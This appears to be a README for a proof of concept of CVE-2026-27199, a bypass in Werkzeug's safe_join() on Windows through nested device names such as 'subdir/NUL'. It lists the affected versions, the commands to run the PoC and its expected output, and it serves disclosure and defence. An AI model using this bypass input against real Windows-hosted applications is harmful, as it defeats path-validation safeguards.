# CVE-2026-27199 PoC: Werkzeug `safe_join()` Windows Device-Name Bypass

> **Status:** Publicly disclosed. Fixed in **werkzeug 3.1.6**.  
> **Severity:** Moderate  
> **Reporter:** [@alimezar](https://github.com/alimezar)  
> **Advisory:** [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x)

---

## Affected Versions

| Package   | Affected  | Patched |
|-----------|-----------|---------|
| werkzeug  | `< 3.1.6` | `3.1.6` |

---

## Proof of Concept

> **Requires:** Windows, Python 3.8+, `werkzeug < 3.1.6`

```bash
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
```

### Expected output (vulnerable version)

```
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name          : nt

[+] safe_join(base, 'NUL')        -> None  (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL  (bypass!)

[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS — data silently discarded by device

[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
    Upgrade to werkzeug >= 3.1.6 to remediate.
```

### Expected output (patched version)

```
[+] safe_join(base, 'subdir/NUL') -> None  (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.
```

---
## References

- [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x) — this advisory
- [GHSA-hgf8-39gv-g3f2](https://github.com/advisories/GHSA-hgf8-39gv-g3f2) — prior related advisory
- [GHSA-87hc-h4r5-73f7](https://github.com/advisories/GHSA-87hc-h4r5-73f7) — prior related advisory
- [Werkzeug changelog](https://werkzeug.palletsprojects.com/en/stable/changes/)

---

*This PoC is published for educational and defensive purposes following responsible disclosure and public patch availability.*